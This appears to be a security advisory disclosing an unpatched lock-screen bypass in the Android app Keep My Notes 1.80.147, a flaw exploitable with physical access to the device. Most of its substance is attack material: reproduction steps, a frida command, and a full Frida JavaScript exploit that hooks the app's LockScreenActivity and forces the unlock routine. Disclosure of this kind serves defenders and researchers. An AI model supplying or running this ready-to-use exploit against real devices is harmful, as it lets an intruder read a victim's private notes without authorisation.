Keep My Notes 1.80.147 - Improper Access Control

Description

An attacker with physical access to the victim's device can bypass the application's password/pin lock to access user data. This is possible due to lack of adequate security controls to prevent dynamic code manipulation.

Proof of Concept

It is important to know that for a successful exploitation, the "Continue" button must be clicked repeatedly.

https://user-images.githubusercontent.com/51862990/168275718-5f8e230f-54f1-4c7c-8393-c58f0dcfda2b.mp4

Steps to reproduce

1. Install and configure frida as indicated in the following link.

2. Now just run this command to hook the run function so that it can be dynamically rewritten to bypass application protection.

   frida -U 'Keep My Notes' -l

3. Now all you have to do is click the "Continue" button 3 or 4 times, then close the application and finally open it again.

System Information

• Package Name: org.whiteglow.keepmynotes

• Application Label: Keep My Notes

• Mobile app version: 1.80.147

• OS: Android 8.0 (API 26)

Exploit

// exploit.js
Java.perform(() => {
 console.log("[+] Hooking LookScreenActivity - Class f - Method run");
 const LockScreenActivity = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity");
 const f = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity$f");
 f.run.implementation = () => {
        console.log("Bypass Lock Screen");
        LockScreenActivity.$new().d();
    }
})

Mitigation

There is currently no patch available for this vulnerability.

References

• Vendor page http://www.kitetech.co/keepmynotes